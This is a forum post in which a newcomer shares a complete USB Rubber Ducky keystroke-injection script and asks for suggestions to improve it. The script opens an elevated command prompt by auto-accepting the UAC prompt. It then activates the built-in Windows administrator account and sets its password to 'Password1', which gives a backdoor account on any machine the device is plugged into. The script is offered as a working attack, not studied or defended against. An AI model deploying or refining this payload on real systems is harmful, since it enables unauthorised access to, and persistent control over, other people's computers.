Hello everyone,
I am new to the USB Rubber Ducky and today I made my first script. It is pretty simle, but it works.
This script will open a powershell with administratior privleges after bypassing UAC, then it will activate the build-in administrator account and change the password to Password1.
If anyone has any changes that would make this better, please share.
REM Author securityoverride, with code based off of Hak5Darren
REM Creation Date 5-26-15
REM This script will activate the default admin account and change the password
REM ***Bypass UAC***
DELAY 2000
WINDOWS r
DELAY 500
STRING powershell Start-process cmd.exe -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 500
REM ***Activate the default admin account***
STRING net user administrator /active:yes
ENTER
DELAY 500
REM ***Change the default admin password to "Password1"***
STRING net user administrator Password1
ENTER
DELAY 500
REM ***GTFO***
STRING exit
ENTER